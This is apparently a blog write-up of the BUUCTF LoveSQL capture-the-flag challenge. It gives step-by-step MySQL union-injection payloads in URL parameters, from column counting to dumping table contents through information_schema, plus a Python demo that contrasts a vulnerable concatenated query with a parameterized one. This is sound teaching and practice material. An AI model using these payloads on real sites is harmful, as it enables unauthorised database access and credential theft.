BUUCTF-WEB: [Geek Challenge 2019] LoveSQL 1


Tools: Firefox, hackbar
This is a very conventional SQL union injection.

Steps:

Union injection process

The first step is to test the injection point (a few small tips: try a single quote, and 1=1, or 1=1, etc.) to determine whether the injection is string type or numeric type.

payload: ?username=1'%23&password=123 ==> NO,Wrong username password!!!  (The payload is entered in the URL, so # cannot be typed directly; use its URL encoding %23.)
payload: ?username=1&password=123 ==> NO,Wrong username password!!!

Both return the same message with no SQL error, so the quote and the comment were accepted by the query: the injection point is string type.

The second step: use ORDER BY to check the number of columns in the query.

payload: ?username=1' order by 1 %23&password=123 ==> NO,Wrong username password!!!
payload: ?username=1' order by 4 %23&password=123 ==> Unknown column '4' in 'order clause'

ORDER BY 1 succeeds and ORDER BY 4 errors, so the table has 3 columns.

The third step: if the page echoes query results, find the echo positions (echo here means the query result is displayed back on the page).

payload: ?username=1' union select 1,2,3 %23&password=123

This shows that positions 2 and 3 are echoed.


The fourth step: use UNION SELECT to dump the database name, the table names, the column names, and the values.

payload: ?username=1' union select 1,2,database() %23&password=123  [view database name ==> geek]

payload: ?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'%23&password=123  [view table names ==> geekuser, l0ve1ysq1]
or: /check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

payload: ?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'%23&password=123  [view column names ==> id, username, password]

payload: ?username=1' union select 1,2,group_concat(username) from geekuser%23&password=123  [dump values from geekuser ==> nothing useful]

payload: ?username=1' union select 1,2,group_concat(username,id,password) from l0ve1ysq1%23&password=123  [dump l0ve1ysq1 ==> get the flag]

Get the flag: flag{5f7db3c7-1ce1-44d7-9d7d-892f8c66a671}
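As an added illustration (not part of the original writeup or the challenge's own check.php), the steps above reproduced against an in-memory SQLite database: the vulnerable string-built login query next to a parameterized one, showing why the ORDER BY probe and the UNION payload work on the first and fail on the second. The table, row and column layout are constructed; SQLite has no `#` comment, so the payloads end with `-- ` where the writeup uses `%23`.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the challenge's 'geek' database (one fake row)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE geekuser (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO geekuser VALUES (1, 'admin', 'constructed-secret')")
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> list:
    """Hypothetical check.php-style query built by concatenation: the quote in
    the input closes the string literal and the rest of the input becomes SQL."""
    sql = ("SELECT id, username, password FROM geekuser "
           f"WHERE username = '{username}' AND password = '{password}'")
    return con.execute(sql).fetchall()


def login_parameterized(con: sqlite3.Connection, username: str, password: str) -> list:
    """Same query with bound parameters: the input is compared as data only."""
    sql = ("SELECT id, username, password FROM geekuser "
           "WHERE username = ? AND password = ?")
    return con.execute(sql, (username, password)).fetchall()


def order_by_probe(n: int) -> bool:
    """Step 2 of the writeup: does 'ORDER BY n' run without error? SQLite
    rejects an out-of-range ordinal just as MySQL reports 'Unknown column',
    so the largest n that succeeds is the number of columns in the query."""
    con = make_db()
    try:
        login_vulnerable(con, f"1' ORDER BY {n} -- ", "123")
        return True
    except sqlite3.OperationalError:
        return False


# Step 4 payload from the writeup, with SQLite's '-- ' in place of MySQL's %23.
PAYLOAD = "1' UNION SELECT 1, 2, group_concat(username) FROM geekuser -- "


def demo() -> tuple:
    """Returns (rows leaked by the vulnerable query, rows from the safe query)."""
    con = make_db()
    return (login_vulnerable(con, PAYLOAD, "123"),
            login_parameterized(con, PAYLOAD, "123"))


if __name__ == "__main__":
    print("columns:", max(n for n in range(1, 6) if order_by_probe(n)))  # 3
    leaked, safe = demo()
    print("vulnerable:", leaked)   # [(1, 2, 'admin')]
    print("parameterized:", safe)  # []
```

The union result lands in echo positions 2 and 3 exactly as on the challenge page, while the parameterized query treats the whole payload as a username string and matches nothing.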

If the union injection knowledge points are unclear, see: https://blog.csdn.net/Waffle666/article/details/111410039

Origin blog.csdn.net/Waffle666/article/details/113200939